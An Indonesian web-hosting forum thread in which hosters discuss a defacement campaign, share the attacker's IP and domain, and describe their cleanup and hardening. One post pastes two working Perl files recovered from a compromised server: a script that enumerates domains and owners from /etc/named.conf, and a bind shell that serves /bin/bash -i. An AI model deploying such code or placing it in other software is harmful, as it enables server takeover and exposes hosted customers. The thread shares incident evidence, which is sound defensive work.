Hacked by Dr. CruZz

[jaapns]

waduh... harus mulai check list security lagi nih

 

[IIXPLANET]

Domain Name: Indonesiancoder.com -
IP Address: 75.126.221.216 -
Hostname: Medusa.in-hell.com -

ini servernya punya nya dracoola

 

[fasthostonline]

Domain Name: Indonesiancoder.com -
IP Address: 75.126.221.216 -
Hostname: Medusa.in-hell.com -

ini servernya punya nya dracoola

yup bener banget barusan saya cek rasae sewa dedicated ip tuh

 

[galuh82]

secara tidak langsung aktivitas mereka mengganggu kenyamanan .. knapa anak bangsa yang bodoh kayak kita2 ini yang jadi sasaran hehehe

hmm ...

 

[fasthostonline]

secara tidak langsung aktivitas mereka mengganggu kenyamanan .. knapa anak bangsa yang bodoh kayak kita2 ini yang jadi sasaran hehehe

hmm ...

ya kayak gini mungkin yang bisa kita jadikan ajang untuk terus belajar karena ilmu ginian ga ada habis nya di pelajhari

moga om dracoola mampir ke thread ini dan ikutan nimbrung

 

[mixmaxspace]

Kalau di server saya, si hacker menggunakan shell script c99 untuk eksekusi akhir saat sudah masuk dan menaruh backdoor, dan kebetulan terdeteksi CSF saat proses itu berlangsung. Tapi sudah kadung, akun klien lsg diubah total. Akun langsung terisi file seperti d.pl shell.php dan juga macam file .txt yang cukup banyak. Dan tentunya file index.php pada folder theme sudah berubah.

Antisipasi saya saat terakhir kejebolan langsung mengubah security php.ini untuk disable function cukup banyak barisnya, dan juga mod security ditambahkan. Jadi mau gak mau banyak IP ke blokir saat akses server, yang penting 3 hari ini sudah aman dari gangguan mereka. mudah-mudahan tidak ada yang keserang lagi.

Berikut file2 yang ada di dalam salah satu folder template WP / joomla yang sudah terinfeksi sbb:

#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>C0ded By Karar alShaMi</title>
<title>WwW.Arab-ExploiT.CoM</title>
<style type="text/css">
.newStyle1 {
background-color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: large;
font-weight: bold;
color: #FFFFFF;
}
.style1 {
text-align: center;
}
</style>
</head>

<body class="newStyle1">

<p class="style1">Domains &amp; Users </p>
<p class="style1">Bypass</p>
<p class="style1">By Karar alShaMi </p>
<p class="style1"> <font color="#FF0000">WwW.Arab-ExploiT.CoM</font></p>
';
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;
close d0mains;
if ($err){
print ('<p class="style1">&nbsp;</p><p class="style1">C0uldn\'t Bypass it , Sorry</p>');
die();
}else{
print '<p class="style1">&nbsp;</p>
<p class="style1">H3r3 !s 411 D0m4!ns &amp; Us3rs :</p>
';}
foreach my $one (@kr)
{
if($one =~ m/.*?zone "(.*?)" {/){
$filename= "/etc/valiases/".$1;
$owner = getpwuid((stat($filename))[4]);
print '<p class="style1">'.$1.' : '.$owner.'</p>
';
}
}
print'</body></html>';

Dan saat proses deface berjalan, dia membuat file baru di folder /tmp/back pada root, yang isinya filenya kayak gini:

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

 

[PusatHosting]

Domain Name: Indonesiancoder.com -
IP Address: 75.126.221.216 -
Hostname: Medusa.in-hell.com -

ini servernya punya nya dracoola

karena sudah bawa nama dracoola kalau mungkin ditanyakan aja siapa dia.
dan satu lagi tred seperti ini tred sensitif dan harusnya lebih leluasa untuk internal dimana hanya bisa di lihat web hoster saja tidak sampai ke khalayak umum. mungkin bisa ke Web hoster Lounge

 

[indoc0der]

emang om dracoola udah dihubungin?

 

[IIXPLANET]

karena sudah bawa nama dracoola kalau mungkin ditanyakan aja siapa dia.
dan satu lagi tred seperti ini tred sensitif dan harusnya lebih leluasa untuk internal dimana hanya bisa di lihat web hoster saja tidak sampai ke khalayak umum. mungkin bisa ke Web hoster Lounge

untuk masalah thread sensitif jika memang dirasa perlu di pindah maka pindahkanlah bro , kan yg berwenang dan memiliki akses comunity guide / moderator , kita2 disini cuma reply aja.

aku fikir ga perlu di pindah ke spesific forum untuk masalah seperti ini , di thread ini sudah pas kok sesuai dari sub forum topic yg disediakan, jika memang ini di pindah maka pindahkanlah semua yg berhubungan dengan masalah hacking ke bagian tersebut , ga cuma dari masalah ini saja . karena msalah ini kan sifatnya menyangkut orang banyak di server , jadi aku rasa newbie atau webhoster pun berhak tahu kok .

 

[IIXPLANET]

kecuali untuk masalah penanggulangan / antisipasi / clearing mungkin bisa masuk ke specific web hoster lounge dimana bersifat privacy untuk para hoster saja. ini cuma saran aja sih